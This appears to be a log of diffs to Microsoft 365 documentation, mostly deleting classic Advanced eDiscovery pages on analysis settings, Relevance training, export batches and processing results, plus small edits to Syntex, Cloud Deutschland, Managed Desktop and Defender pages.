-## Advanced settings for Express analysis
-<a name="BK_AdvancedSettings"> </a>
-
-You can optionally set **Advanced settings** to change the default Express analysis parameters.
-
-1. In the **Analyze** section:
-
- - In the **Near duplicates and email threads**, enter the **Document similarity** value, or accept the default of 65%.
-
- - In the **Max number of themes** enter or select a value for the number of themes to create. The default is 200.
-
- > [!NOTE]
- > Increasing the number of themes affects performance, as well as the ability of a theme to generalize. The higher the number of themes, the more granular they are. For example, if a set of 50 themes include a theme such as "Basketball, Spurs, Clippers, Lakers"; 300 themes may include separate themes: "Spurs", "Clippers", "Lakers". If you had no awareness of the theme "Basketball" and use this feature for ECA, seeing the theme "Basketball" could be useful. But, if the processing had too many themes, you may never see the word "Basketball" and may not know that Spurs and Clippers are good Basketball themes to review, rather than items that go on boots and used for hair.
-
- - In the **Suggested themes** choose **Modify** to suggest theme words to control Themes processing. Advanced eDiscovery will focus on these suggested words and try to create one or more relevant themes, based on the "Max number of themes" settings.
-
- For example, if the suggested word is "computer", and you specified "2" as the "Max number of Themes", Advanced eDiscovery will try to generate two themes that relate to the word "computer". The two themes might be "computer software" and "computer hardware", for example.
-
- ![Add suggested theme](../media/06e9ffd3-a76c-423b-b450-9e465eb9a02f.png)
-
- - **Mode** From the drop-down list, select a **Themes** option:
-
- - **Create and apply model**: Calculates themes by models from a segment of the files and then distributes files among them.
-
- - **Create model**: Calculates a themes model from a segment of the files. The Apply process of dividing files is done separately at another time.
-
- - **Apply model**: This option is only shown if a model was created previously and not yet applied. This will divide the files based on the themes.
-
-2. In the **Export** section:
-
-1. In the **Select export batch**:
-
- - From the **Export batch** list, select the batch name or export results to Export batch 01, (the default batch).
-
- - To export results for new files that you added to an existing case, continue with your current batch. To create a session in the batch, select the same batch number and click **Create export session** You can use this option to export the same parameters as the previous batch, in an incremental manner.
-
- - To export to a new batch, click **Add** ![add icon](../media/c2dd8b3a-5a22-412c-a7fa-143f5b2b5612.png) and enter a new name in **Batch name** (or accept the default) and a description in **Batch description**. Click **OK**.
-
- - To edit a batch name or description, select the name in **Export batch**, click **Edit** ![Edit icon](../media/3d613660-7602-4df2-bdb9-14e9ca2f9cf2.png), and then modify the fields.
-
- > [!NOTE]
- > After you've run sessions for an export batch, they cannot be deleted. In addition, only some parameters can be edited once the first session is run.
-
- - To create a duplicate export batch, choose **Duplicate export batch** ![Create a duplicate export batch icon](../media/3f6d5f59-e842-4946-a493-473528af0119.jpg) and enter a name and a description for the duplicate batch in the panel.
-
- - To delete an export batch, choose **Delete** ![Delete an export batch icon](../media/92a9f8e0-d469-48da-addb-69365e7ffb6f.jpg).
-
- - To view the history of a batch, choose **Batch history** ![View history icon](../media/a80cc320-d96c-4d91-8884-75fe2cb147e2.jpg).
-
-2. Under Define p **opulation:** Select **Include only files above Relevance cut-off score** and/or **Refine export batch** if you want to fine-tune the settings for your export batch. If you select **Include only files above Relevance cut-off score**, then the **Issue** is enabled, and if the file's relevance score is higher than the cut-off score for the selected issue, then the file is exported. The file will be exported unless it's excluded by the ' **For review** filter. If you select **Refine export batch**, then the **De-dupe** and **Filter by 'For review' field** radio buttons are enabled. If you choose **De-dupe**, then duplicates files will be filtered-out according to the policy defined: [Case level (default): from every set of duplicate files in the entire case, all but one file will be de-duped. Custodian level: from every set of duplicate files of the same custodian, all but one file will be de-duped. A record of all duplicate files is available in export output. If you choose **Filter by 'For review'** field, select **Modify under Metadata** to enter your **'For review'**field settings. Select **Include input files**to include source files in the package content. You can clear this option to speed up the export process. Note that the Native files will be exported in any case.
-
-3. Under **Define metadata**, select from the following options in the **Export template** list (once per session).
-
- - **Standard**: Basic set of data items, metadata, and properties. Use this option when import data was already processed in Advanced eDiscovery and export data is uploaded to a system that already contains the files. By default, export template columns are created and filled.
-
- - **All**: Full set of standard metadata including all processing data, as well as Analyze and Relevance scores. This template is required when Advanced eDiscovery performs the processing and file data is uploaded to an external system for the first time.
-
- - **Issues**: Select **All Issues** or select a particular issue you have created.
-
-Choose **OK**to save the advanced settings, **Restore defaults** to use default values, or **Cancel** to cancel setting the advanced settings.
-
-## See also
-<a name="BK_AdvancedSettings"> </a>
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/use-relevance-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/use-relevance-in-advanced-ediscovery.md deleted file mode 100644
@@ -1,144 +0,0 @@
-title: "Use the Relevance module in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-ms.date: 9/14/2017
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: 5d671821-d188-42da-a9ce-9cfe92beedfd
-description: "Learn about the Relevance module in Advanced eDiscovery, including a workflow and guidelines and steps for training and file review."
-
-# Use the Relevance module in Advanced eDiscovery (classic)
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-In Advanced eDiscovery, the Relevance module includes the Relevance training and review of files related to a case. The Relevance workflow is shown and described as follows:
-
-![Relevance workflow](../media/44c67dd2-7a20-40a9-b0ed-784364845c77.gif)
-
-- **Cycles of assessment and tracking**:
-
- - **Assessment**: Advanced eDiscovery enables early assessment based on a random sample of files and uses this assessment to apply decisions to determine the performance of the predictive coding process.
-
- - **Track**: Advanced eDiscovery calculates and displays interim results of the assessment while monitoring statistical validity of the process.
-
-- **Cycles of training and tracking**:
-
- - **Tag**: Advanced eDiscovery learns Relevance criteria specific to each issue based on the expert's iterative review and tagging of individual files.
-
- - **Track**: Advanced eDiscovery calculates and displays interim results of the Relevance training while monitoring statistical validity of the process.
-
-- **Batch calculation**: Advanced eDiscovery takes the accumulated and learned Relevance criteria, applies it to the entire file collection, and generates Relevance scores for each file.
-
-- **Decide**: Advanced eDiscovery displays the results of the analysis applied to the entire case after Batch calculation and displays data for making document review decisions.
-
-- **Test**: Advanced eDiscovery results can be tested to verify the validity and effectiveness of the Advanced eDiscovery processing.
-
-## Guidelines for Relevance training and review
-
-Following is an overview of guidelines for Relevance training and review:
-
-- **Errors and inconsistencies**: If tagging errors are made during training, return to previous file samples to correct them. If there are too many errors to correct or there is a new perspective of the case or issue, the Relevance criteria should be redefined by the Administrator, and the Relevance training restarted.
-
-- **Tagging and training**:
-
- - Files should be tagged based on content only. Do not consider metadata, such as custodian, date, or file path.
-
- - Do not consider date range indications in the text when tagging files.
-
- - Do not consider embedded graphical images when tagging files.
-
- - If viewing a file using the **formatted text view** icon while tagging, do not consider the formatting of text. For example, a word displayed with a strikethrough (a horizontal line through its center indicating deletion) is still considered by Relevance as part of the analyzed text.
-
- - Ignore text applied to Relevance (as set by the Case Manager or Administrator) will be removed in the displayed file content in the text view in Relevance. If the values for Ignore text were defined after Relevance training already started, the new ignored text will be applied to sample files created from the point in which it was defined. The Ignore Text feature should be used cautiously, as its use may reduce the performance of file analysis
-
- - Use the **Skip tagging** option only when necessary. Advanced eDiscovery does not train based on skipped files. In assessment, if it's hard to tell whether a file is relevant, it is better to tag as Relevant (R) or Not relevant (NR) whenever possible rather than selecting **Skip**. When Advanced eDiscovery evaluates training, it can then be seen how well these types of files were processed.
-
- - Even files with a very small amount of extracted text should be tagged in training as R/NR, rather than as "Skip", when possible.
-
- - Tagging can impact the classifier as long as the file is readable and can be tagged as R/NR.
-
- - The file sequence number on the displayed Sample files list on the **Tag** tab allows the user to return to the original displayed order of the files.
-
- - You can go back to any sample and change the tagging of the assessment and training set files. The changes will be applied when creating the next sample.
-
- - Scanned Excel files in PDF format should be treated the same as native Excel files when tagging files.
-
- - When in doubt regarding the Relevance tagging of a file, consult an expert. Incorrect tagging during the Relevance training can lead to lost time later in the process and may also have a negative impact on the quality of the overall results.
-
- - Keywords that were defined in Keyword lists will be displayed in colors to help the user identify relevant files while tagging.
-
-- **Batch calculation**: Files that were tagged as R/NR by the expert will receive a score of either 0 or 100. This applies to tagging made before Batch calculation. If the expert switched the issue to Idle after Batch Calculation and continued tagging this issue, the newly tagged scores will not be 100/0 but rather the original score.
-
-- **Issues and sampling mode**: Issues are usually turned Off when work on them is completed (Relevance training is stabilized and Batch calculation was performed), when the issues are canceled, or when another user is working on the issues.
-
-## Steps in Relevance training
-
-In the **Relevance \> Track** tab, Advanced eDiscovery provides recommendations on how to proceed in the processing, with the following next steps. The implications are described below when each of the following steps is recommended in the Relevance training process.
-
-- Tagging / Continue tagging: File review and Relevance tagging performed by an expert for each file and issue within a sample.
-
- - Implication: An existing sample needs to be tagged.
-
-- Assessment / Continue assessment: Enables early validation of case issue relevance and a preliminary view of the relevance of the file population imported for the current case.
-
- - Implication: More assessment is required or recommended.
-
-- Training / Continue training: Process during which Advanced eDiscovery learns from the expert who is tagging the file samples and acquires the ability to identify Relevance criteria pertinent to each issue within the context of each case.
-
- - Implication: The issue needs more training; the next sample should be created and tagged.
-
-- Batch calculation: Relevance process in which Advanced eDiscovery takes the knowledge acquired during the training stage and applies it to the entire file population. All files in the pertinent file group are assessed for relevance and assigned a Relevance score.
-
- - Implication: The issue has stabilized, and Batch calculation can be performed.
-
-- Catch-up: Relevance indicates when an expert reviews and tags a sample of files selected from an additional file load during a Rolling Loads scenario.
-
- - Implication: A new load has been added, and Catch-up is required to continue working.
-
-- Tag inconsistencies: Process identifies, via an Advanced eDiscovery algorithm, inconsistencies in the file tagging process that may negatively impact the analysis.
-
- - Implication: The next sample will include files that have been tagged in previous samples, and their tagging must be redone.
-
-- Update classifier: Allows the user to apply tagging or seeding changes.
-
- - Implication: Tagging and seeding changes can be applied without needing to manually run another Relevance sample.
-
-- On hold: The Relevance training process is completed.
-
- - Implication: No Relevance training is required at this point.
-
-Although Advanced eDiscovery guides you through the process, with recommended Next steps at different stages, it also allows you to navigate between tabs and pages, and to make choices to address situations that may be pertinent to your individual case, issue, or document review process.
-
-It is possible to accept or override Advanced eDiscovery Next step processing choices. If you want to perform a step other than the recommended Next step, click the **Next step** listed in the expanded issue display in the dialog, click the **Modify** button next to the Next step, and select another Next step option.
-
-> [!NOTE]
-> Some options may remain disabled after unlocking as they are not supported for use at that point in the process.
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Understanding Assessment in Relevance](assessment-in-relevance-in-advanced-ediscovery.md)
-
-[Tagging and Assessment](tagging-and-assessment-in-advanced-ediscovery.md)
-
-[Tagging and Relevance training](tagging-and-relevance-training-in-advanced-ediscovery.md)
-
-[Tracking Relevance analysis](track-relevance-analysis-in-advanced-ediscovery.md)
-
-[Deciding based on the results](decision-based-on-the-results-in-advanced-ediscovery.md)
-
-[Testing Relevance analysis](test-relevance-analysis-in-advanced-ediscovery.md)
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/view-analyze-results-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/view-analyze-results-in-advanced-ediscovery.md deleted file mode 100644
@@ -1,84 +0,0 @@
-title: "View Analyze results in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-ms.date: 9/14/2017
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: 5974f3c2-89fe-4c5f-ac7b-57f214437f7e
-description: "Understand where to view the results of the Analyze process in Advanced eDiscovery, including definitions of the displayed task options."
-
-# View Analyze results in Advanced eDiscovery (classic)
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-In Advanced eDiscovery, progress and results for the Analyze process can be viewed in a variety of displays as described below.
-
-## View Analyze task status
-
-In **Prepare \> Analyze \> Results \> Task status**, the status is displayed during and after Analyze process execution.
-
-![Analyze task status](../media/d0372978-ce08-4f4e-a1fc-aa918ae44364.png)
-
-The tasks displayed may vary depending on the options selected.
-
-- **ND/ET: setup**: Prepares for the run, for example, sets run and case parameters.
-
-- **ND/ET: ND calculation**: Processes Near-duplicate analysis of files.
-
-- **ND/ET: ET calculation**: Performs Email Thread analysis on the entire email set.
-
-- **ND/ET: pivots and similarities**: Performs pivot and file similarity processing.
-
-- **ND/ET: metadata update**: Finalizes the new data collected on the files in the database.
-
-- **Themes: themes calculation**: Runs themes analysis. (Displayed only if selected.)
-
-- **Task status**: This line is displayed after task completion. While tasks are running, run duration is displayed.
-
-> [!NOTE]
-> The Analyze results of Near-duplicates and Email Threads (ND and ED) applies to the number of documents to be processed. It does not include Exact duplicate files.
-
-## View Near-duplicates and Email Threads status
-
-The **Target** population results display the number of documents, emails, attachments, and errors in the target population.
-
-The **Documents** results display the number of pivots, unique near-duplicates, and exact duplicate files.
-
-The **Emails** results display the number of inclusive, inclusive minus, unique inclusive copies, and the rest of the email messages. The different types of email results are:
-
-- **Inclusive**: An inclusive email is the terminating node in an email thread and contains all the previous history of that thread. As a result, the reviewer can safely focus on the inclusive email, without the need to read the previous messages in the thread.
-
-- **Inclusive minus**: An inclusive email is designated as inclusive minus if there are one or more different attachments associated with the parents of the inclusive message. In this context, the term Parent is used for messages located upwards on the email thread or conversations included in that specific inclusive email. A reviewer can use the inclusive minus indication as a signal that although it might not be necessary to review the content of the inclusive email parents, it may be useful to review the attachments associated with the inclusive path parents.
-
-- **Inclusive copy**: An inclusive email is designated as inclusive copy if it's the copy of another message marked as inclusive or inclusive minus. In other words, this message has the same subject and body as another inclusive message and, as such, co-resides in the same node. Because inclusive copy messages contain the same content, they can usually be skipped in the review process.
-
-- **The rest**: This indicates email that doesn't contain any unique content, and therefore doesn't fall into any of the previous three categories. These email messages don't need to be reviewed. If a message contains an attachment that isn't on a later inclusive email, then the attachment might need to be reviewed. This is indicated by the existence of an inclusive minus email within the thread.
-
-The **Attachments** results display the number of attachments, according to such type as unique and duplicates.
-
-![Near-duplicates and Email Threads](../media/54491303-0ee3-4739-b42e-d1ee486842fd.png)
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Understanding document similarity](understand-document-similarity-in-advanced-ediscovery.md)
-
-[Setting Analyze options](set-analyze-options-in-advanced-ediscovery.md)
-
-[Setting ignore text](set-ignore-text-in-advanced-ediscovery.md)
-
-[Setting Analyze advanced settings](view-analyze-results-in-advanced-ediscovery.md)
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/view-batch-history-and-export-past-results https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/view-batch-history-and-export-past-results.md deleted file mode 100644
@@ -1,66 +0,0 @@
-title: "View batch history and export past results in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-ms.date: 9/14/2017
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: 35d52b41-75ab-4144-9edf-31e11453bd5d
-description: "Learn how to view detailed information for selected export batch sessions and how to undo the last export session in Advanced eDiscovery."
-ms.custom: seo-marvel-apr2020
-
-# View batch history and export past results in Advanced eDiscovery (classic)
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-The following section describes additional options for batch viewing and export of data in Advanced eDiscovery.
-
-## Viewing Export batch history and exporting previous batches
-
-The Export history dialog provides detailed information of selected export batch sessions and also provides the ability to undo the last session.
-
-1. In **Export \> Setup**, select the batch name from the **Export batch** drop-down list.
-
-2. To the right of the export batch name, select the **Batch history** icon:
-
- ![Export batch history icon](../media/a14f6ef9-0c3c-4851-b65d-9380f2d8a38a.gif)
-
- The Batch history dialog is displayed.
-
- ![Export batch history](../media/04c5b75c-348c-491d-b4fe-716659333890.png)
-
-3. If it is necessary to roll back a previous session, click **Undo last session**. Rollback can be performed multiple times, which cancels the last session.
-
-4. If you want to download data at any time from a previously executed export batch session, click the **Download** icon ![Export batch history download icon](../media/de69b920-a6ac-4ddb-b93e-e1cc5888e6c4.gif) next to the desired export batch to be exported.
-
-5. When the **Shared access signature** dialog is displayed, click **Copy to clipboard** to copy the export session data to the local machine, and then click **Close**. The Security &amp; Compliance Center **eDiscovery Export Tool** dialog is displayed.
-
- ![Export eDiscovery dialog](../media/01f79d2d-6da0-45e6-9c6f-ab12347572cb.gif)
-
-6. In the **eDiscovery Export Tool** dialog:
-
-1. In **Paste the Shared Access Signature that will be used to connect to the source**, paste the **Shared access signature** value, which was previously copied to the clipboard.
-
-2. Click **Browse** to select the target location for storing the downloaded export files on a local machine.
-
-3. Click **Start**. The export files are downloaded to the local machine.
-
-## Related topics
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Exporting results ](export-results-in-advanced-ediscovery.md)
-
-[Export report fields](export-report-fields-in-advanced-ediscovery.md)
-
compliance https://docs.microsoft.com/en-us/microsoft-365/compliance/view-process-module-results-in-advanced-ediscovery https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/compliance/view-process-module-results-in-advanced-ediscovery.md deleted file mode 100644
@@ -1,111 +0,0 @@
-title: "View Process module results in Advanced eDiscovery"
-f1.keywords:
-- NOCSH
-ms.author: markjjo
-author: markjjo
-manager: laurawi
-titleSuffix: Office 365
-ms.date: 9/14/2017
-audience: Admin
-ms.topic: article
-ms.service: O365-seccomp
-localization_priority: Normal
-search.appverid:
-- MOE150-- MET150
-ms.assetid: c6f016cb-409f-4ae9-911c-1395cf0c86ea
-description: "Learn about how to find the results of a Process Module run in Advanced eDiscovery, including task status and process summary."
-
-# View Process module results in Advanced eDiscovery (classic)
-
-After **Prepare** \> **Process** is initiated, you can view progress and results.
-
-> [!NOTE]
-> Advanced eDiscovery requires an Office 365 E3 with the Advanced Compliance add-on or an E5 subscription for your organization. If you don't have that plan and want to try Advanced eDiscovery, you can [sign up for a trial of Office 365 Enterprise E5](https://go.microsoft.com/fwlink/p/?LinkID=698279).
-
-## Process task status
-
-In **Prepare** \> **Process** \> **Results**, the page shows the current status (if Process is currently running) or the last Process status task status as shown in the following example.
-
-![Process module task status](../media/9430f9e7-a4dd-47c7-ac2e-2c6a60fc948b.png)
-
-The displayed tasks may vary depending on the Process options selected.
-
-- **Inventory**: Advanced eDiscovery iterates through all files selected for Process and performs basic data collection.
-
-- **Calculate signatures**: Calculates the MD5 digital signatures.
-
-- **Compounds extraction**: Extracts inner or contained files recursively from compound files (for example, PST, ZIP, MSG). Extracted files are stored in the case folder of the case.
-
-- **Synchronizing database**: Internal database process.
-
-- **File copy**: Copies Process files. This task is always displayed, even when the advanced Copy files option is selected.
-
-- **Text extraction**: When there are native files, Advanced eDiscovery extracts text from these files using DTSearch. The extracted text of these files is stored as text files in the case folder.
-
-- **Updating metadata**: Processes the loaded metadata.
-
-- **Finalizing**: Internal processing that finalizes data of loaded case files (for example, identify error and success files).
-
-Task status: Displayed after task completion. While tasks are running, run duration is displayed.
-
-> [!NOTE]
-> Completed tasks may also include totals for files that completed processing or files with errors.
-
-> [!TIP]
-> "Cancel" provides a rollback option to stop Process execution and then roll back to the previous data population or saved processed data. Rollback clears all processed data. If you do not want the processed data to be lost (for example, you plan to reload these files), select the "Cancel" option in this window to choose not to roll back.
-
-## Process summary
-
-In Prepare \> Process \> Results \> Process summary, a breakdown of loaded file results is displayed according to successful file processing and error results.
-
-The panes present a graphical display of imported file statistics, as follows:
-
-- **Process summary accumulate**d: All files in the case.
-
-- **Process summary last**: Files loaded from the last session or action.
-
-- **Families last**: Family information in the case (if any).
-
-- If **Seed** files were added, the number of seed files is listed per issue that was defined for the files.
-
- If the marking of **Seed** files failed, that is also noted.
-
-- If **Pre-tagged** files were added, the number of pre-tagged files is listed per issue that was defined for the files.
-
- If the marking of **Pre-tagged** files failed, that is also noted.
-
-![Process module summary](../media/2086a691-9e3d-4117-beb2-a5c3a9a4cc94.png)
-
-## Process summary accumulated and last charts
-
-The left bar includes Source + extracted files: which is all files found.
-
-The right bar, Processed, includes:
-
-- Files with load errors
-
-- Successfully loaded files, which may include:
-
- - **Existing**: Files that were loaded before and are now loaded again (including duplicates).
-
- - **Text**: Unique files with text.
-
- - **Non-text**: Empty text files, empty native text files, native non-text files.
-
- - **Duplicate**s: Duplicate files with text.
-
-## Last process errors
-
-In Prepare \> Process \> Results \> Last process errors, details of the errors in the last session or action performed are displayed.
-
-![Process module errors](../media/4771d0f4-4217-445a-9ba4-8b6541c5ad09.png)
-
-## See also
-
-[Advanced eDiscovery (classic)](office-365-advanced-ediscovery.md)
-
-[Running the Process module and loading data](run-the-process-module-and-load-data-in-advanced-ediscovery.md)
-
contentunderstanding https://docs.microsoft.com/en-us/microsoft-365/contentunderstanding/adoption-getstarted https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/contentunderstanding/adoption-getstarted.md
@@ -26,28 +26,30 @@ With new AI services and capabilities, you can build content understanding and c
|Manual entry| Form processing | Document understanding | |:-------|:--------|:--------|
-| Data entry and labor-intensive on any content | Process digital content - photos, scans, receipts, business cards, videos with OCR & text | Capture content types and metadata from contracts, resumes, and other structured documents |
-| Interactive | Pre-built, automated | Custom, assisted |
-| People doing the work | Taught by your subject matter experts (SMEs). Capture content types and metadata from contracts, resumes, other structured documents. | SMEs are less involved. from purchase orders, applications, other semi structured and structured documents |
+| Data entry and labor-intensive on any content. | Identify files and extract data from structured or semi-structured documents, such as forms or invoices. | Identify and extract data from unstructured documents, such as letters or contracts, where the text entities you want to extract reside in sentences or specific regions of the document. |
+| Interactive. | Custom, assisted. | Pre-built, automated. |
+| People doing the work. | Taught by your subject matter experts (SMEs). | SMEs are less involved. |
-The following table explains what you get when you use SharePoint Syntex:
+The following table explains availability and licensing for SharePoint Syntex:
| Form processing | Document understanding | |:-------|:-------|
-| Available in APAC, Australia, Canada, EU, JP, LATAM, UK, US | Available in all regions |
-| Uses AI Builder credits - 1M credits = 2000 pages; Consumption is about 2000 invoices=2 units. Power Automate is required - if you need more you can add it. 1M credits allocated for 300+ licenses purchased. You can also purchase credits separately. | Models work on all latin alphabet languages. In addition to English: German, Swedish, French, Spanish, Italian, and Portuguese. |
-| Provisioned against the default common data service environment| Does not have capacity restrictions. |
+| Form processing relies on Power Platform. <br>For information about global availability for Power Platform and AI Builder, see [Power Platform availability](https://dynamics.microsoft.com/geographic-availability/). | Available in all regions. |
+| Uses AI Builder credits.<br>Credits can be purchased in batches of 1M.<br>1M credits are included when 300+ SharePoint Syntex licenses are purchased.<br>1M credits will allow processing of 2000 file pages. | Models work on all latin alphabet languages. In addition to English: German, Swedish, French, Spanish, Italian, and Portuguese. |
+| Provisioned against the default common data service environment. | Does not have capacity restrictions. |
+
+For more information about AI Builder credits and units, see [AI Builder licensing](https://docs.microsoft.com/ai-builder/administer-licensing).
There are two different ways of understanding your content. The model type you use is based on file format and use case: | Form processing | Document understanding | |:-------|:-------|
-| Created from document library | Created in the content center, part of SharePoint Syntex |
-| Model created in AI builder | Model created in native interface |
-| Used for semi-structured file formats | Used for unstructured file formats |
-| Settable classifier | Trainable classifier with optional extractors |
-| Restricted to a single library | Can be applied to multiple libraries |
-| Train on PDF, JPG, PNG format, total 50 MB/500 pp | Train on 5-10 PDF, Office, or email files, including negative examples |
+| Created from document library. | Created in the content center, part of SharePoint Syntex. |
+| Model created in AI builder. | Model created in native interface. |
+| Used for semi-structured file formats. | Used for unstructured file formats. |
+| Settable classifier. | Trainable classifier with optional extractors. |
+| Restricted to a single library. | Can be applied to multiple libraries. |
+| Train on PDF, JPG, PNG format, total 50 MB/500 pp. | Train on 5-10 PDF, Office, or email files, including negative examples. |
SharePoint Syntex integrates with Microsoft 365 compliance features like:
enterprise https://docs.microsoft.com/en-us/microsoft-365/enterprise/ms-cloud-germany-transition-phases https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/enterprise/ms-cloud-germany-transition-phases.md
@@ -73,6 +73,10 @@ Additional considerations:
- Upon completion of the OneDrive migration to the German region, data indexes are rebuilt. Features that depend on search indexes may be affected while reindexing is in progress.
+- Microsoft Cloud Deutschland customers whose SharePoint Online instance is not yet migrated need to stay on SharePoint Online PowerShell module/Microsoft.SharePointOnline.CSOM version 16.0.20616.12000 or below. Otherwise, connections to SharePoint Online via PowerShell or the client-side object model will fail.
+
+- Microsoft Cloud Deutschland customers whose SharePoint Online instance is migrated must update SharePoint Online PowerShell module/Microsoft.SharePointOnline.CSOM to version 16.0.20717.12000 or above. Otherwise, connections to SharePoint Online via PowerShell or the client-side object model will fail.
+ ## Skype for Business Online
managed-desktop https://docs.microsoft.com/en-us/microsoft-365/managed-desktop/get-ready/readiness-assessment-fix https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/managed-desktop/get-ready/readiness-assessment-fix.md
@@ -23,6 +23,9 @@ For each check, the tool will report one of four possible results:
|Not ready | *Enrollment will fail if you don't fix these issues.* Follow the steps in the tool or this article to resolve them. | |Error | The Azure Active Director (AD) role you're using doesn't have sufficient permission to run this check. |
+> [!NOTE]
+> The results reported by this tool reflect the status of your settings only at the specific point in time that you ran it. If you later make any changes to policies in Microsoft Intune, Azure Active Directory, or Microsoft 365, items that were "Ready" can become "Not ready." To avoid problems with Microsoft Managed Desktop operations, check the specific settings described in this article before you change any policies.
+ ## Microsoft Intune settings You can access Intune settings at the Microsoft Endpoint Manager [admin center](https://endpoint.microsoft.com).
managed-desktop https://docs.microsoft.com/en-us/microsoft-365/managed-desktop/get-started/conditional-access https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/managed-desktop/get-started/conditional-access.md
@@ -15,6 +15,10 @@ ms.topic: article
After you've completed enrollment in Microsoft Managed Desktop, you need to adjust certain Microsoft Intune and Azure Active Directory (Azure AD) settings to allow for management and maintain security. Set the following settings to exclude the Azure AD groups that contain Microsoft Managed Desktop devices and users. For steps to exclude groups, see [Conditional Access: Users and groups](https://docs.microsoft.com/azure/active-directory/conditional-access/concept-conditional-access-users-groups#exclude-users).
+> [!NOTE]
+> If you make any changes after enrollment to policies in Microsoft Intune, Azure Active Directory, or Microsoft 365, it's possible that Microsoft Managed Desktop could stop operating properly. To avoid problems with Microsoft Managed Desktop operations, check the specific settings described in [Fix issues found by the readiness assessment tool](../get-ready/readiness-assessment-fix.md) before you change any policies.
++ ## Microsoft Intune settings - Autopilot deployment profile: exclude the **Modern Workplace Devices -All** Azure AD group. For steps, see [Enroll Windows devices in Intune by using Windows Autopilot](https://docs.microsoft.com/mem/autopilot/enrollment-autopilot).
security https://docs.microsoft.com/en-us/microsoft-365/security/mtp/mtp-configure-auto-investigation-response https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/mtp/mtp-configure-auto-investigation-response.md
@@ -1,20 +1,20 @@
--- title: Configure automated investigation and response capabilities in Microsoft 365 Defender description: Configure automated investigation and response with self-healing in Microsoft 365 Defender
-search.appverid: MET150
+search.appverid: MET150
author: denisebmsft ms.author: deniseb
-manager: dansimp
+manager: dansimp
audience: ITPro ms.topic: article ms.prod: microsoft-365-enterprise localization_priority: Normal ms.collection: -- M365-security-compliance -- m365initiative-m365-defender
+- M365-security-compliance
+- m365initiative-m365-defender
ms.custom: autoir ms.reviewer: evaldm, isco
-f1.keywords: CSH
+f1.keywords: CSH
--- # Configure automated investigation and response capabilities in Microsoft 365 Defender
@@ -31,18 +31,17 @@ To configure automated investigation and response capabilities, follow these ste
3. [Review your security and alert policies in Office 365](#review-your-security-and-alert-policies-in-office-365). 4. [Make sure Microsoft 365 Defender is turned on](#make-sure-microsoft-365-defender-is-turned-on).
-Then, after you're all set up, [review pending and completed actions in the Action center](#review-pending-and-completed-actions-in-the-action-center).
-
+Then, after you're all set up, [review pending and completed actions in the Action center](#review-pending-and-completed-actions-in-the-action-center).
## Prerequisites for automated investigation and response in Microsoft 365 Defender |Requirement |Details | |--|--|
-|Subscription requirements |One of the subscriptions: <br/>- Microsoft 365 E5 <br/>- Microsoft 365 A5 <br/>- Microsoft 365 E5 Security<br/>- Microsoft 365 A5 Security<br/>- Office 365 E5 plus Enterprise Mobility + Security E5 plus Windows E5<br/><br/>See [Microsoft 365 Defender licensing requirements](https://docs.microsoft.com/microsoft-365/security/mtp/prerequisites?#licensing-requirements).|
-|Network requirements |- [Microsoft Defender for Identity](https://docs.microsoft.com/azure-advanced-threat-protection/what-is-atp) enabled<br/>- [Microsoft Cloud App Security](https://docs.microsoft.com/cloud-app-security/what-is-cloud-app-security) configured<br/>- [Microsoft Cloud App Security integrated with Microsoft Defender for Identity](https://docs.microsoft.com/cloud-app-security/aatp-integration) |
-|Windows machine requirements |- Windows 10, version 1709 or later installed (See [Windows 10 release information](https://docs.microsoft.com/windows/release-information/)) with the following threat protection services configured:<br/>- [Microsoft Defender for Endpoint](https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/configure-endpoints) <br/>- [Microsoft Defender Antivirus](https://docs.microsoft.com/windows/security/threat-protection/windows-defender-antivirus/configure-windows-defender-antivirus-features) |
